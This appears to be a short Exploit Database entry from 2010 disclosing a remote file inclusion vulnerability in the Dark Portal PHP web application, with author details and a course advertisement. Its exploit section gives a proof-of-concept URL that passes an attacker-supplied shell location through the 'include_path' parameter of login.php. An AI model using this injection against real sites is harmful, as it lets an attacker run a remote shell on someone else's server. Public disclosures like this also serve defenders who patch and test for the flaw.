Dark Hart Portal - 'login.php' Remote File Inclusion

EDB-ID:

12553

CVE:

N/A


Author:

CoBRa_21

Type:

webapps


Platform:

PHP

Date:

2010-05-10


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

-------------------------------------------------------------------------------------

Dark Portal (login.php) Remote File Inclusion Vulnerability

-------------------------------------------------------------------------------------
 
Author:    CoBRa_21
 
Mail:    uyku_cu@windowslive.com
 
Script Download:  http://sourceforge.net/projects/darkportal/
 
-------------------------------------------------------------------------------------
 
Exploit:
 
http://localhost/[PATH]/login.php?include_path= [Shell]

-------------------------------------------------------------------------------------